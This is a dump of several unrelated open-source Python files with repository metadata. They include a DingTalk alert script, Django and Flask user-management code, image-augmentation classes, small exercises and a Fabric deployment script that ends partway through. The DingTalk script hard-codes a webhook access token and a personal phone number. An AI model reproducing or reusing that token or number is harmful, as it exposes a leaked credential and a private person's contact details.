696b87b0bff7a5bcf494441ef9ff10dbad893cd4
|
8fd07ea363ba4263bafe25d213c72cc9a93e2b3e
|
/devops/Day4_json_requests_zabbix-api/zabbix/dingtalk.py
|
2112181a91ce4aaf534cba9d5b2bc2035ec13296
|
[] |
no_license
|
ml758392/python_tedu
|
82e12ae014f0fc81230386fab07f901510fc8837
|
9f20798604db0ac8cd7b69d8c7a52ee361ebc7a7
|
refs/heads/master
| 2020-04-12T08:30:42.354663 | 2019-03-29T11:55:30 | 2019-03-29T11:55:30 | 162,386,878 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 821 |
py
|
# -*-coding:utf-8-*-
import json
import requests
import sys
def send_msg(url, reminders, msg):
    """POST a plain-text message to a DingTalk robot webhook.

    Args:
        url: full webhook URL including the access token.
        reminders: list of phone numbers to @-mention.
        msg: message body text.

    Returns:
        The raw response body returned by the webhook endpoint.
    """
    payload = {
        "msgtype": "text",  # 发送消息类型为文本
        "at": {
            "atMobiles": reminders,
            "isAtAll": False,  # 不@所有人
        },
        "text": {
            "content": msg,  # 消息正文
        }
    }
    response = requests.post(
        url,
        data=json.dumps(payload),
        headers={'Content-Type': 'application/json;charset=utf-8'},
    )
    return response.text
if __name__ == '__main__':
    # Usage: python dingtalk.py "<message text>"
    msg = sys.argv[1]
    reminders = ['15937762237']  # people to @-mention so they are sure to see it
    # NOTE(review): the webhook access_token is hard-coded in source control --
    # treat it as leaked and move it to configuration/environment.
    url = 'https://oapi.dingtalk.com/robot/send?access_token=f62936c2eb31a053f422b5fdea9ea4748ce873a399ab521ccbf3ec\
29fefce9d1'
    print(send_msg(url, reminders, msg))
|
[
"yy.tedu.cn"
] |
yy.tedu.cn
|
616469de1aec009732d1ae11d1d7737bda848a16
|
75a2d464d10c144a6226cb5941c86423a1f769cf
|
/users/views.py
|
21cc73b926aab722ac47e1f4965cdb0561c47aff
|
[] |
no_license
|
Swiftkind/invoice
|
f5543cbe81b6d42e9938470265d7affb56ab83dd
|
17615ea9bfb1edebe41d60dbf2e977f0018d5339
|
refs/heads/master
| 2021-09-07T18:16:01.647083 | 2018-02-08T08:13:18 | 2018-02-08T08:13:18 | 115,474,697 | 0 | 3 | null | 2018-02-27T06:58:42 | 2017-12-27T02:55:40 |
Python
|
UTF-8
|
Python
| false | false | 5,494 |
py
|
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib import messages
from django.http import Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.views.generic import TemplateView
from django.views import View
from users.forms import CompanyForm, UserChangePasswordForm, UserUpdateForm, SigninForm, SignupForm
from users.mixins import UserIsOwnerMixin
from users.models import Company, User
class SigninView(TemplateView):
    """Sign a user in via SigninForm.
    """
    template_name = 'users/signin.html'

    def get(self, *args, **kwargs):
        """Render the signin form; already-authenticated users skip to index.
        """
        if self.request.user.is_authenticated:
            return redirect('index')
        form = SigninForm()
        return render(self.request, self.template_name,{'form':form})

    def post(self, *args, **kwargs):
        """Validate credentials and start the session.
        """
        form = SigninForm(data=self.request.POST)
        if form.is_valid():
            # SigninForm presumably authenticates during validation and caches
            # the user on user_cache (AuthenticationForm convention) -- confirm.
            login(self.request, form.user_cache)
            return redirect('index')
        else:
            context={ 'form':form,}
            return render(self.request, self.template_name, context)
class SignupView(TemplateView):
    """Register a new user together with the company they belong to."""

    template_name = 'users/signup.html'

    def get(self, *args, **kwargs):
        """Render the combined company + user signup forms."""
        context = { 'company_form' : CompanyForm(),
                    'signup_form' : SignupForm(),
                  }
        return render(self.request, self.template_name, context)

    def post(self, *args, **kwargs):
        """Create the company and its first user.

        Both forms must validate; the company is saved first so the user
        row can reference it.
        """
        company_form = CompanyForm(self.request.POST, self.request.FILES)
        signup_form = SignupForm(self.request.POST, self.request.FILES)

        if signup_form.is_valid() and company_form.is_valid():
            company = company_form.save(commit=False)
            user = signup_form.save(commit=False)
            company.save()
            user.company = company
            user.save()
            # Fix: this is a success notification, previously sent through
            # messages.error().
            messages.success(self.request, 'Account successfully created. Activate your account from the admin.')
            return redirect('index')
        else:
            # Fix: re-render the already-bound forms (previously the forms
            # were re-created without FILES, discarding validation errors
            # for uploaded files).
            context = { 'company_form' : company_form,
                        'signup_form' : signup_form,
                      }
            return render(self.request, self.template_name, context)
class SignoutView(LoginRequiredMixin, View):
    """Sign the current user out.
    """
    def get(self, *args, **kwargs):
        """End the session and send the visitor back to the signin page.
        """
        logout(self.request)
        return redirect('signin')
class UserProfileView(UserIsOwnerMixin, TemplateView):
    """Read-only profile page for a single user.
    """
    template_name = 'users/profile.html'

    def get(self, *args, **kwargs):
        """Render the profile of the user named by the user_id URL kwarg.
        """
        context = {'user': get_object_or_404(User, pk=kwargs['user_id'])}
        return render(self.request, self.template_name, context=context)
class UserUpdateView(UserIsOwnerMixin, TemplateView):
    """Edit a user together with their company record.
    """
    template_name = 'users/update_user.html'

    def get(self, *args, **kwargs):
        """Render edit forms pre-filled with the user's current data.

        Raises Http404 when the requester is not the target user.
        NOTE(review): UserIsOwnerMixin presumably enforces this too --
        confirm before removing either check.
        """
        user = get_object_or_404(User, pk=kwargs['user_id'])
        if self.request.user == user:
            context = { 'company_form':CompanyForm(instance=user.company),
                        'user_form': UserUpdateForm(instance=user),
                    }
            return render(self.request, self.template_name, context=context)
        else:
            raise Http404("Does not exist")

    def post(self, request, *args, **kwargs):
        """Persist changes to both the user and the company.
        """
        user = get_object_or_404(User, pk=kwargs['user_id'])
        user_form = UserUpdateForm(self.request.POST, self.request.FILES,instance=user)
        company_form = CompanyForm(self.request.POST, self.request.FILES,instance=user.company)
        if user_form.is_valid() and company_form.is_valid():
            company_form.save()
            user_form.save()
            messages.success(self.request, 'User is successfully updated')
            return redirect('index' )
        else:
            # Re-render with the bound forms so field errors are shown.
            context = { 'company_form': company_form,
                        'user_form' : user_form,
                    }
            return render(self.request, self.template_name, context=context)
class UserSettingView(UserIsOwnerMixin, TemplateView):
    """ Static settings landing page for the current user.
    """
    template_name = 'users/setting.html'

    def get(self, *args, **kwargs):
        """ Render the settings template (no extra context needed).
        """
        return render(self.request, self.template_name)
class UserChangePassword(UserIsOwnerMixin, TemplateView):
    """ Change the current user's password.
    """
    template_name = 'users/change_password.html'

    def get(self, *args, **kwargs):
        """ Render the change-password form.
        """
        context = {}
        context['form'] = UserChangePasswordForm()
        return render(self.request, self.template_name, context)

    def post(self, *args, **kwargs):
        """ Validate the old password and save the new one.

        NOTE(review): after a password change Django normally needs
        update_session_auth_hash() to keep the session valid -- confirm
        whether logging the user out here is the intended behaviour.
        """
        form = UserChangePasswordForm(self.request.POST, user=self.request.user)
        if form.is_valid():
            form.save()
            return redirect('index')
        else:
            context = {}
            context['form'] = UserChangePasswordForm(self.request.POST, user=self.request.user)
            return render(self.request, self.template_name, context)
|
[
"[email protected]"
] | |
df7db5f6cf855b9e25fa5feb01494b88573aacf4
|
c5458f2d53d02cb2967434122183ed064e1929f9
|
/sdks/python/test/test_contains_asset_predicate.py
|
4fe42254ff5b1cf16affd36b2f5c261675e7f2ab
|
[] |
no_license
|
ross-weir/ergo-node-api-sdks
|
fd7a32f79784dbd336ef6ddb9702b9dd9a964e75
|
9935ef703b14760854b24045c1307602b282c4fb
|
refs/heads/main
| 2023-08-24T05:12:30.761145 | 2021-11-08T10:28:10 | 2021-11-08T10:28:10 | 425,785,912 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,131 |
py
|
"""
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.contains_asset_predicate_all_of import ContainsAssetPredicateAllOf
from openapi_client.model.scanning_predicate import ScanningPredicate
globals()['ContainsAssetPredicateAllOf'] = ContainsAssetPredicateAllOf
globals()['ScanningPredicate'] = ScanningPredicate
from openapi_client.model.contains_asset_predicate import ContainsAssetPredicate
class TestContainsAssetPredicate(unittest.TestCase):
    """Unit-test stubs for the ContainsAssetPredicate model."""

    def setUp(self):
        # No shared fixtures needed yet.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testContainsAssetPredicate(self):
        """Test ContainsAssetPredicate"""
        # FIXME: construct object with mandatory attributes with example values
        # model = ContainsAssetPredicate()  # noqa: E501
        pass
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
[
"[email protected]"
] | |
0c77dbbd8fb08d26e300e02084f0f0fbd2f1fcfe
|
80c3546d525a05a31d30cc318a44e053efaeb1f1
|
/tensorpack/dataflow/imgaug/misc.py
|
7fc983d4c9de61f53efc05459cca5493fcaca5a5
|
[
"Apache-2.0"
] |
permissive
|
yaroslavvb/tensorpack
|
0f326bef95699f84376465609b631981dc5b68bf
|
271ffad1816132c57baebe8a1aa95479e79f4ef9
|
refs/heads/master
| 2021-05-03T11:02:22.170689 | 2018-02-06T08:18:48 | 2018-02-06T08:18:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,419 |
py
|
# -*- coding: UTF-8 -*-
# File: misc.py
import numpy as np
import cv2
from .base import ImageAugmentor
from ...utils import logger
from ...utils.argtools import shape2d
from .transform import ResizeTransform, TransformAugmentorBase
__all__ = ['Flip', 'Resize', 'RandomResize', 'ResizeShortestEdge', 'Transpose']
class Flip(ImageAugmentor):
    """
    Random flip the image either horizontally or vertically.
    """

    def __init__(self, horiz=False, vert=False, prob=0.5):
        """
        Args:
            horiz (bool): use horizontal flip.
            vert (bool): use vertical flip.
            prob (float): probability of flip.
        """
        super(Flip, self).__init__()
        if horiz and vert:
            raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
        elif horiz:
            self.code = 1   # cv2.flip code 1 = flip around the y-axis (horizontal)
        elif vert:
            self.code = 0   # cv2.flip code 0 = flip around the x-axis (vertical)
        else:
            raise ValueError("At least one of horiz or vert has to be True!")
        self._init(locals())

    def _get_augment_params(self, img):
        # Decide once per image whether to flip; keep (h, w) so that the
        # coordinate augmentation below mirrors points consistently.
        h, w = img.shape[:2]
        do = self._rand_range() < self.prob
        return (do, h, w)

    def _augment(self, img, param):
        do, _, _ = param
        if do:
            ret = cv2.flip(img, self.code)
            if img.ndim == 3 and ret.ndim == 2:
                # cv2.flip drops a trailing singleton channel; restore it.
                ret = ret[:, :, np.newaxis]
        else:
            ret = img
        return ret

    def _augment_coords(self, coords, param):
        do, h, w = param
        if do:
            # Mirror point coordinates using the same per-image decision.
            if self.code == 0:
                coords[:, 1] = h - coords[:, 1]
            elif self.code == 1:
                coords[:, 0] = w - coords[:, 0]
        return coords
class Resize(TransformAugmentorBase):
    """ Resize image to a target size"""

    def __init__(self, shape, interp=cv2.INTER_LINEAR):
        """
        Args:
            shape: (h, w) tuple or a int
            interp: cv2 interpolation method
        """
        # shape2d normalizes an int into an (h, h) pair.
        shape = tuple(shape2d(shape))
        self._init(locals())

    def _get_augment_params(self, img):
        # Fixed target size regardless of the input's aspect ratio.
        return ResizeTransform(
            img.shape[0], img.shape[1],
            self.shape[0], self.shape[1], self.interp)
class ResizeShortestEdge(TransformAugmentorBase):
    """
    Resize the shortest edge to a certain number while
    keeping the aspect ratio.
    """

    def __init__(self, size, interp=cv2.INTER_LINEAR):
        """
        Args:
            size (int): the size to resize the shortest edge to.
        """
        size = int(size)
        self._init(locals())

    def _get_augment_params(self, img):
        h, w = img.shape[:2]
        # Scale so the shorter edge lands exactly on self.size; the other
        # edge is scaled proportionally and rounded to the nearest pixel.
        scale = self.size * 1.0 / min(h, w)
        if h < w:
            newh, neww = self.size, int(scale * w + 0.5)
        else:
            newh, neww = int(scale * h + 0.5), self.size
        return ResizeTransform(
            h, w, newh, neww, self.interp)
class RandomResize(TransformAugmentorBase):
    """ Randomly rescale width and height of the image."""

    def __init__(self, xrange, yrange, minimum=(0, 0), aspect_ratio_thres=0.15,
                 interp=cv2.INTER_LINEAR):
        """
        Args:
            xrange (tuple): a (min, max) tuple. If is floating point, the
                tuple defines the range of scaling ratio of new width, e.g. (0.9, 1.2).
                If is integer, the tuple defines the range of new width in pixels, e.g. (200, 350).
            yrange (tuple): similar to xrange, but for height.
            minimum (tuple): (xmin, ymin) in pixels. To avoid scaling down too much.
            aspect_ratio_thres (float): discard samples which change aspect ratio
                larger than this threshold. Set to 0 to keep aspect ratio.
            interp: cv2 interpolation method
        """
        super(RandomResize, self).__init__()
        assert aspect_ratio_thres >= 0
        self._init(locals())

        def is_float(tp):
            return isinstance(tp[0], float) or isinstance(tp[1], float)
        # Both ranges must be interpreted the same way (ratios vs pixels).
        assert is_float(xrange) == is_float(yrange), "xrange and yrange has different type!"
        self._is_scale = is_float(xrange)
        if self._is_scale and aspect_ratio_thres == 0:
            # Keeping aspect ratio exactly requires identical scale ranges.
            assert xrange == yrange

    def _get_augment_params(self, img):
        cnt = 0
        h, w = img.shape[:2]

        def get_dest_size():
            # Sample a candidate (width, height), clamped by self.minimum
            # and rounded to the nearest pixel.
            if self._is_scale:
                sx = self._rand_range(*self.xrange)
                if self.aspect_ratio_thres == 0:
                    sy = sx
                else:
                    sy = self._rand_range(*self.yrange)
                destX = max(sx * w, self.minimum[0])
                destY = max(sy * h, self.minimum[1])
            else:
                sx = self._rand_range(*self.xrange)
                if self.aspect_ratio_thres == 0:
                    sy = sx * 1.0 / w * h
                else:
                    sy = self._rand_range(*self.yrange)
                destX = max(sx, self.minimum[0])
                destY = max(sy, self.minimum[1])
            return (int(destX + 0.5), int(destY + 0.5))

        # Rejection-sample until the aspect-ratio change is within threshold;
        # give up (identity resize) after 50 failed attempts.
        while True:
            destX, destY = get_dest_size()
            if self.aspect_ratio_thres > 0:  # don't check when thres == 0
                oldr = w * 1.0 / h
                newr = destX * 1.0 / destY
                diff = abs(newr - oldr) / oldr
                if diff >= self.aspect_ratio_thres + 1e-5:
                    cnt += 1
                    if cnt > 50:
                        logger.warn("RandomResize failed to augment an image")
                        return ResizeTransform(h, w, h, w, self.interp)
                    continue
            return ResizeTransform(h, w, destY, destX, self.interp)
class Transpose(ImageAugmentor):
    """
    Random transpose the image
    """
    def __init__(self, prob=0.5):
        """
        Args:
            prob (float): probability of transpose.
        """
        super(Transpose, self).__init__()
        self.prob = prob
        self._init()

    def _get_augment_params(self, img):
        # One boolean decision per image, shared with _augment_coords.
        return self._rand_range() < self.prob

    def _augment(self, img, do):
        ret = img
        if do:
            ret = cv2.transpose(img)
            if img.ndim == 3 and ret.ndim == 2:
                # cv2.transpose drops a trailing singleton channel; restore it.
                ret = ret[:, :, np.newaxis]
        return ret

    def _augment_coords(self, coords, do):
        if do:
            # Transposing swaps the x/y axes of every point.
            coords = coords[:, ::-1]
        return coords
|
[
"[email protected]"
] | |
92572d40e11aaec728a9177ec310fa9eb822e9f5
|
b6f4e527154b82f4e3fa48f06ca53fc15bf08283
|
/Day02/circle.py
|
020bf65e82244b1110af1fb98f7a1eaca88e783e
|
[] |
no_license
|
Light-City/Python-100-Days
|
74118e36c658db6c897f847e7e554311af036b9d
|
1fe049a1fe1e64082752d2d32cb75c1a4349cded
|
refs/heads/master
| 2020-03-18T12:44:53.191512 | 2018-05-24T09:49:22 | 2018-05-24T09:49:22 | 134,741,794 | 3 | 1 | null | 2018-05-24T16:29:02 | 2018-05-24T16:29:02 | null |
UTF-8
|
Python
| false | false | 288 |
py
|
"""
输入半径计算圆的周长和面积
Version: 0.1
Author: 骆昊
Date: 2018-02-27
"""
import math
radius = float(input('请输入圆的半径: '))
perimeter = 2 * math.pi * radius
area = math.pi * radius * radius
print('周长: %.2f' % perimeter)
print('面积: %.2f' % area)
|
[
"[email protected]"
] | |
6df0e64800da4c8a788cf625ac191169d6db205a
|
5c4852f02b20c5c400c58ff61702a4f35358d78c
|
/editor_orig.py
|
6a4e667273bf50ee0537555a81df701903e3eec4
|
[] |
no_license
|
anovacap/daily_coding_problem
|
6e11f338ad8afc99a702baa6d75ede0c15f02853
|
e64a0e76555addbe3a31fd0ca0bb81e2715766d2
|
refs/heads/master
| 2023-02-23T11:04:30.041455 | 2021-01-29T18:10:36 | 2021-01-29T18:10:36 | 302,237,546 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,992 |
py
|
class SimpleEditor:
    """A toy text editor with cut/copy/paste and misspelling counting.

    The whole document is held as one Python string, so every edit rebuilds
    the string -- intentionally naive; see the benchmarker below.
    """

    def __init__(self, document):
        self.document = document
        # Known-good words loaded from the system dictionary.
        self.dictionary = set()
        # On windows, the dictionary can often be found at:
        # C:/Users/{username}/AppData/Roaming/Microsoft/Spelling/en-US/default.dic
        with open("/usr/share/dict/words") as input_dictionary:
            for line in input_dictionary:
                words = line.strip().split(" ")
                for word in words:
                    self.dictionary.add(word)
        # Clipboard shared by cut/copy/paste.
        self.paste_text = ""

    def cut(self, i, j):
        # Remove document[i:j], keeping it on the clipboard.
        self.paste_text = self.document[i:j]
        self.document = self.document[:i] + self.document[j:]

    def copy(self, i, j):
        # Keep document[i:j] on the clipboard without modifying the text.
        self.paste_text = self.document[i:j]

    def paste(self, i):
        # Insert the clipboard contents at position i.
        self.document = self.document[:i] + self.paste_text + self.document[i:]

    def get_text(self):
        return self.document

    def misspellings(self):
        """Count space-separated tokens not present in the dictionary.

        NOTE(review): splitting on single spaces means punctuation/newlines
        make otherwise-correct words count as misspelled.
        """
        result = 0
        for word in self.document.split(" "):
            if word not in self.dictionary:
                result = result + 1
        return result
import timeit
class EditorBenchmarker:
    """Times SimpleEditor operations with ``timeit`` over given documents.

    The class attributes are code templates; their ``{}`` placeholders are
    filled with the repetition count N (in __init__) or the document text
    (in ``benchmark``) before timeit executes them.
    """

    new_editor_case = """
from __main__ import SimpleEditor
s = SimpleEditor("{}")"""

    editor_cut_paste = """
for n in range({}):
    if n%2 == 0:
        s.cut(1, 3)
    else:
        s.paste(2)"""

    editor_copy_paste = """
for n in range({}):
    if n%2 == 0:
        s.copy(1, 3)
    else:
        s.paste(2)"""

    editor_get_text = """
for n in range({}):
    s.get_text()"""

    editor_mispellings = """
for n in range({}):
    s.misspellings()"""

    def __init__(self, cases, N):
        self.cases = cases
        self.N = N
        # Bake the repetition count into each statement template up front.
        self.editor_cut_paste = self.editor_cut_paste.format(N)
        self.editor_copy_paste = self.editor_copy_paste.format(N)
        self.editor_get_text = self.editor_get_text.format(N)
        self.editor_mispellings = self.editor_mispellings.format(N)

    def benchmark(self):
        """Print timings (3 repeats of 1 run each) for every operation/case."""
        for case in self.cases:
            print("Evaluating case: {}".format(case))
            new_editor = self.new_editor_case.format(case)
            cut_paste_time = timeit.repeat(stmt=self.editor_cut_paste,setup=new_editor,repeat=3,number=1)
            print("{} cut paste operations took {} s".format(self.N, cut_paste_time))
            copy_paste_time = timeit.repeat(stmt=self.editor_copy_paste,setup=new_editor,repeat=3,number=1)
            print("{} copy paste operations took {} s".format(self.N, copy_paste_time))
            get_text_time = timeit.repeat(stmt=self.editor_get_text,setup=new_editor,repeat=3,number=1)
            print("{} text retrieval operations took {} s".format(self.N, get_text_time))
            mispellings_time = timeit.repeat(stmt=self.editor_mispellings,setup=new_editor,repeat=3,number=1)
            print("{} mispelling operations took {} s".format(self.N, mispellings_time))
if __name__ == "__main__":
    # Benchmark 20 repetitions of each operation on a tiny document.
    b = EditorBenchmarker(["hello friends"], 20)
    b.benchmark()
|
[
"[email protected]"
] | |
6b5be029fd1626d37c9b7f3db3aa07efd58e1011
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_123/627.py
|
28c02feb9a393af2190da5d1cd6130c71872869c
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,171 |
py
|
__author__ = 'jeff'

from collections import deque

# Code Jam solver ("Osmos"-style): absorb strictly smaller motes; when stuck,
# either insert helper motes (each of size a-1, roughly doubling a) or delete
# every remaining mote, whichever costs fewer moves.
base = "A-small-attempt2"
#base = "A1_test"
f = open(base+'.in','r')
fout = open(base+'.out','w')

t = int(f.readline())

def proc( a, motes):
    # Greedily absorb every mote strictly smaller than a; a grows as it eats.
    while( len( motes ) and motes[0] < a ):
        a += motes.popleft()
    return a

max_lev = 100000

for case in range(1,t+1):
    [a,n] = f.readline().split(' ')
    a=int(a)
    n=int(n)
    motes = list(map( int, f.readline()[0:-1].split(' ')))
    motes.sort()
    print(a,motes)
    motes = deque( motes )
    moves = 0
    adds = removes = 0
    lev_count = 0
    while( len( motes) ):
        a=proc(a,motes)
        if( not len( motes ) ):
            break
        a_copy = a
        these_adds = 0
        # Simulate inserting (a-1)-sized motes until the next mote is edible.
        while( a>1 and a_copy <= motes[0] ):
            these_adds += 1
            a_copy += (a_copy - 1)
        if( these_adds > 0 and these_adds < len( motes )):
            adds += these_adds
            a = a_copy
        else:
            # Cheaper (or forced, when a == 1) to delete the rest.
            removes += len( motes )
            motes = deque([])
    moves = moves + adds + removes
    out_s = 'Case #{0}: {1}\n'.format(case,moves)
    print( out_s )
    fout.write(out_s)

f.close()
fout.close()
|
[
"[email protected]"
] | |
459e8127e4b5cb873a598644dc79c3d2708b3db1
|
a9c0a8d815b6453aca945849f3b402f75684bfcb
|
/project/api/services.py
|
95d316eb964a262ab8aa954303e31d09a23b1d26
|
[] |
no_license
|
harrywang/my-flask-tdd-docker
|
4035b666a3366cd059a3a65c68c7c9ad9b637da3
|
362c33e7caa3bf35a62cff71f3c567c5e8de1fd2
|
refs/heads/master
| 2022-04-13T23:12:04.725775 | 2020-03-21T18:14:00 | 2020-03-21T18:14:00 | 248,801,429 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 679 |
py
|
# project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
    """Return every User row."""
    return User.query.all()
def get_user_by_id(user_id):
    """Return the User with the given primary key, or None."""
    return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
    """Return the User with the given email, or None."""
    return User.query.filter_by(email=email).first()
def add_user(username, email):
    """Create, persist and return a new User."""
    user = User(username=username, email=email)
    db.session.add(user)
    db.session.commit()
    return user
def update_user(user, username, email):
    """Overwrite the user's username and email, commit, and return it."""
    user.username = username
    user.email = email
    db.session.commit()
    return user
def delete_user(user):
    """Delete the user row, commit, and return the (detached) object."""
    db.session.delete(user)
    db.session.commit()
    return user
|
[
"[email protected]"
] | |
e23633a5a9b66be7ed21624a319c2ac19699c898
|
81a1c5db1f24a7daf4fe51de499e1aea81d8ea05
|
/fabfile.py
|
94155b79ffeb1d48061ee035c7bbca818b7c3f36
|
[] |
no_license
|
Beomi/azure-django-test
|
cf0d1fe323a63d9ba2672b8ebea2fc3e170980ce
|
a811afb62501f2fe245226f9bb94cd51bebc6866
|
refs/heads/master
| 2021-06-19T15:53:18.932591 | 2017-06-08T12:20:34 | 2017-06-08T12:20:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| true | false | 6,241 |
py
|
from fabric.contrib.files import append, exists, sed, put
from fabric.api import env, local, run, sudo
import random
import os
import json
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# deploy.json파일을 불러와 envs변수에 저장합니다.
with open(os.path.join(PROJECT_DIR, "deploy.json")) as f:
envs = json.loads(f.read())
# TODO: Required Fields: REPO_URL, PROJECT_NAME, REMOTE_HOST, REMOTE_PASSWORD, REMOTE_USER, REMOTE_HOST_SSH @ deploy.json
# developer: chagne this!
REPO_URL = envs['REPO_URL']
PROJECT_NAME = envs['PROJECT_NAME']
REMOTE_HOST_SSH = envs['REMOTE_HOST_SSH']
REMOTE_HOST = envs['REMOTE_HOST']
REMOTE_USER = envs['REMOTE_USER']
REMOTE_PASSWORD = envs['REMOTE_PASSWORD']
STATIC_ROOT_NAME = 'static_deploy'
STATIC_URL_NAME = 'static'
MEDIA_ROOT = 'uploads'
# TODO: Server Engineer: you should add env.user as sudo user and NOT be root
env.user = REMOTE_USER
username = env.user
# Option: env.password
env.hosts = [
REMOTE_HOST_SSH,
]
env.password = REMOTE_PASSWORD
project_folder = '/home/{}/{}'.format(env.user, PROJECT_NAME)
apt_requirements = [
'ufw',
'curl',
'git',
'python3-dev',
'python3-pip',
'build-essential',
'python3-setuptools',
'apache2',
'libapache2-mod-wsgi-py3',
'libmysqlclient-dev',
'libssl-dev',
'libxml2-dev',
'libjpeg8-dev',
'zlib1g-dev',
]
def new_server():
    """Provision a fresh host (setup) and then deploy the application."""
    setup()
    deploy()
def setup():
    """One-time host preparation: apt packages and the virtualenv layout."""
    _get_latest_apt()
    _install_apt_requirements(apt_requirements)
    _make_virtualenv()
    #_ufw_allow()
def deploy():
    """Push the latest code and reload the Apache-served Django site."""
    _get_latest_source()
    _put_envs()
    _update_settings()
    _update_virtualenv()
    _update_static_files()
    _update_database()
    #_ufw_allow()
    _make_virtualhost()
    _grant_apache2()
    _grant_sqlite3()
    _restart_apache2()
def _put_envs():
    # Upload the local envs.json so the app can read its runtime settings.
    put(os.path.join(PROJECT_DIR, 'envs.json'), '~/{}/envs.json'.format(PROJECT_NAME))
def _get_latest_apt():
    """Interactively offer to apt-get update && upgrade the host."""
    update_or_not = input('would you update?: [y/n]')
    if update_or_not=='y':
        sudo('sudo apt-get update && sudo apt-get -y upgrade')
def _install_apt_requirements(apt_requirements):
    """Install every apt package from the given list in one apt-get call."""
    # Build " pkg1 pkg2 ..." exactly as the original loop did (leading space).
    joined = ''.join(' ' + package for package in apt_requirements)
    sudo('sudo apt-get -y install {}'.format(joined))
def _make_virtualenv():
    """Install virtualenvwrapper and wire it into ~/.bashrc (first run only)."""
    if not exists('~/.virtualenvs'):
        script = '''"# python virtualenv settings
export WORKON_HOME=~/.virtualenvs
export VIRTUALENVWRAPPER_PYTHON="$(command \which python3)" # location of python3
source /usr/local/bin/virtualenvwrapper.sh"'''
        run('mkdir ~/.virtualenvs')
        sudo('sudo pip3 install virtualenv virtualenvwrapper')
        run('echo {} >> ~/.bashrc'.format(script))
def _get_latest_source():
    """Clone or fetch the repo, then hard-reset to the local HEAD commit."""
    if exists(project_folder + '/.git'):
        run('cd %s && git fetch' % (project_folder,))
    else:
        run('git clone %s %s' % (REPO_URL, project_folder))
    # Deploy exactly the commit currently checked out on the local machine.
    current_commit = local("git log -n 1 --format=%H", capture=True)
    run('cd %s && git reset --hard %s' % (project_folder, current_commit))
def _update_settings():
    """Harden settings.py for production and ensure a persistent SECRET_KEY."""
    settings_path = project_folder + '/{}/settings.py'.format(PROJECT_NAME)
    sed(settings_path, "DEBUG = True", "DEBUG = False")
    sed(settings_path,
        'ALLOWED_HOSTS = .+$',
        'ALLOWED_HOSTS = ["%s"]' % (REMOTE_HOST,)
    )
    # Generate secret_key.py once; settings.py imports it from then on.
    secret_key_file = project_folder + '/{}/secret_key.py'.format(PROJECT_NAME)
    if not exists(secret_key_file):
        chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
        key = ''.join(random.SystemRandom().choice(chars) for _ in range(50))
        append(secret_key_file, "SECRET_KEY = '%s'" % (key,))
        append(settings_path, '\nfrom .secret_key import SECRET_KEY')
def _update_virtualenv():
    """Create the project virtualenv if missing and install requirements."""
    virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
    if not exists(virtualenv_folder + '/bin/pip'):
        run('cd /home/%s/.virtualenvs && virtualenv %s' % (env.user, PROJECT_NAME))
    run('%s/bin/pip install -r %s/requirements.txt' % (
        virtualenv_folder, project_folder
    ))
def _update_static_files():
    """Run Django collectstatic with the project's virtualenv python."""
    virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
    run('cd %s && %s/bin/python3 manage.py collectstatic --noinput' % (
        project_folder, virtualenv_folder
    ))
def _update_database():
    """Apply Django migrations with the project's virtualenv python."""
    virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
    run('cd %s && %s/bin/python3 manage.py migrate --noinput' % (
        project_folder, virtualenv_folder
    ))
def _ufw_allow():
    """Open the firewall for the Apache Full profile (HTTP + HTTPS)."""
    sudo("ufw allow 'Apache Full'")
    sudo("ufw reload")
def _make_virtualhost():
    """Render the Apache2 VirtualHost (mod_wsgi) config and enable the site.

    The doubled braces ({{APACHE_LOG_DIR}}) survive .format() as the literal
    ${APACHE_LOG_DIR} that Apache expects.
    """
    script = """'<VirtualHost *:80>
    ServerName {servername}
    Alias /{static_url} /home/{username}/{project_name}/{static_root}
    Alias /{media_url} /home/{username}/{project_name}/{media_url}
    <Directory /home/{username}/{project_name}/{media_url}>
        Require all granted
    </Directory>
    <Directory /home/{username}/{project_name}/{static_root}>
        Require all granted
    </Directory>
    <Directory /home/{username}/{project_name}/{project_name}>
        <Files wsgi.py>
            Require all granted
        </Files>
    </Directory>
    WSGIDaemonProcess {project_name} python-home=/home/{username}/.virtualenvs/{project_name} python-path=/home/{username}/{project_name}
    WSGIProcessGroup {project_name}
    WSGIScriptAlias / /home/{username}/{project_name}/{project_name}/wsgi.py
    ErrorLog ${{APACHE_LOG_DIR}}/error.log
    CustomLog ${{APACHE_LOG_DIR}}/access.log combined
</VirtualHost>'""".format(
        static_root=STATIC_ROOT_NAME,
        username=env.user,
        project_name=PROJECT_NAME,
        static_url=STATIC_URL_NAME,
        servername=REMOTE_HOST,
        media_url=MEDIA_ROOT
    )
    sudo('echo {} > /etc/apache2/sites-available/{}.conf'.format(script, PROJECT_NAME))
